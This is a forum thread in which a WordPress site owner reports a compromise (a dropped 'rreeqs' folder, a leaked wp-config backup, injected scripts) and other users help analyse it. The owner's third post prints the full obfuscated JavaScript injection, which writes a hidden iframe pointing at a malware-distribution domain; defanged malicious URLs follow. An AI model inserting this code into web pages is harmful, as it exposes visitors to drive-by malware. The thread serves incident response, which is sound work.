Malware on my site - added folder "rreeqs" and wp-config.php.mar04

[MShelby]

site is www.melissashelby.com

Received Malware warning when pulling it up 4 days ago.  Looks like the problem might have happened while I was using the wordpress basic uploader for photos.  The day the malware message showed up several of the uploaded photos started showing up blank with a question mark.  The folder they were uploaded into no longer had my site's UID.  The files that were blank also had the same invalid site id.

In addition, a folder labled rreeqs was added to my site with a bunch of trash that looked like hundreds of stupid links.  A file labled wp-config.php.mar04 was also created and had my password, etc, in it.  Every single one of my htm files and my valid wp-config.php file had a bogus js string added to them.  I deleted all the js.  Tech support - several hours later - was able to delete rreeqs (which I couldn't) and convert the UID on my upload folder back to the correct UID.  In addition, I decided it was time to clean up a bunch of unnecesary files/folders/domains that i didn't use

Next morning, host is down for maintenance for several hours.  When they come back up, it's like my site has been reverted back to where it was the previous day.  All the clean up of unnecessary files is undone.  Rreeqs and wp-config.php.mar04 and the bad UID are back.  The only place I found the bad js string, however was in my wp-config.php.  I did not have to reclean all of the other files.  I had changed my passwords the night before so the wp-config.php.mar04 had the old password instead of the new one.

3 days later and I am still waiting on tech support to acknowledge my trouble ticket and at least respond to me.  I want those files off my domain and can't do it myself.  Or can I?  Any ideas on what it is.  Do you think my suspicion is correct that it came through the wordpress basic uploader or am I way off on that?

Thanks

[sowhat-x]

As far as I know,there doesn't exist in public an exploit for WordPress 2.7.1...you should check the logs during the time of the incident in order to see how they broke in,
as i seriously doubt it came through wordpress basic uploader...is it possible that your wp-config.php was somehow readable/in public view in the first place?
In a side note,would you mind posting the malicious js code here / url it was linking to?...
I've also sent you a pm...

[MShelby]

The bad js was:

<!-- ad --><SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.2">document.write(''+unescape('%3C%69%66%72')+String.fromCharCode(97)+String.fromCharCode(109)+''+'e id'+'="'+String.fromCharCode(50)+String.fromCharCode(98)+String.fromCharCode(97)+''+String.fromCharCode(52)+String.fromCharCode(50)+String.fromCharCode(98)+''+'d'+String.fromCharCode(102)+String.fromCharCode(97)+''+String.fromCharCode(97)+''+unescape('%32%34%35')+String.fromCharCode(100)+String.fromCharCode(52)+String.fromCharCode(48)+''+String.fromCharCode(101)+String.fromCharCode(52)+''+unescape('%61%32%37%37')+'b71'+unescape('%66%33%31')+unescape('%38')+'487"'+' na'+'me="'+'b4d3'+String.fromCharCode(52)+String.fromCharCode(100)+String.fromCharCode(57)+''+unescape('%31%30')+'d'+String.fromCharCode(54)+String.fromCharCode(52)+String.fromCharCode(52)+String.fromCharCode(56)+''+String.fromCharCode(101)+String.fromCharCode(49)+String.fromCharCode(100)+String.fromCharCode(97)+''+'7eb'+unescape('%35%61%34%37')+unescape('%66%62')+String.fromCharCode(102)+''+String.fromCharCode(57)+''+String.fromCharCode(97)+String.fromCharCode(54)+String.fromCharCode(102)+''+'"  w'+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+''+unescape('%3D%31%20%68')+String.fromCharCode(101)+String.fromCharCode(105)+''+unescape('%67%68%74')+unescape('%3D%31%20%66'<script> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C100%2C97%2C115%2C114%2C101%2C116%2C111%2C107%2C102%2C105%2C110%2C46%2C99%2C111%2C109%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C100%2C105%2C115%2C112%2C108%2C97%2C121%2C58%2C110%2C111%2C110%2C101%2C59%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));</script>

The rreeqs folder has been successfully deleted of my site and I don't have any record of the urls that were listed in it. 

Thanks for the info!  I was actually using wordpress 2.7 and hadn't upgraded yet to .1 .  I have now!  The file wp-config.php.maro4 was definitely readable as it was just like a txt file or something and spit out verbatim what my wp-config.php file had in it.

[sowhat-x]

Thanks Melissa - a kinda of quick'n'dirty decoding of it shows the injection was pointing to following malicious url/domain:

hxxp://dasretokfin.com/index.php

The aformantioned domain was spotted few days ago around as well,it's spreading pdf exploits and "Waledac" trojans...
http://www.malwaredomainlist.com/mdl.php?search=dasretokfin.com&colsearch=All&quantity=50

[sowhat-x]

For the record,all domains in the same ip host malware/exploits etc...
http://www.bfk.de/bfk_dnslogger.html?query=95.129.144.228#result

tochtonenado.com was already spotted and added in our list,here's one we had missed though...

hxxp://5rublei.com/unique/?a

[SysAdMini]

hxxp://5rublei.com/unique/?a

Open directory.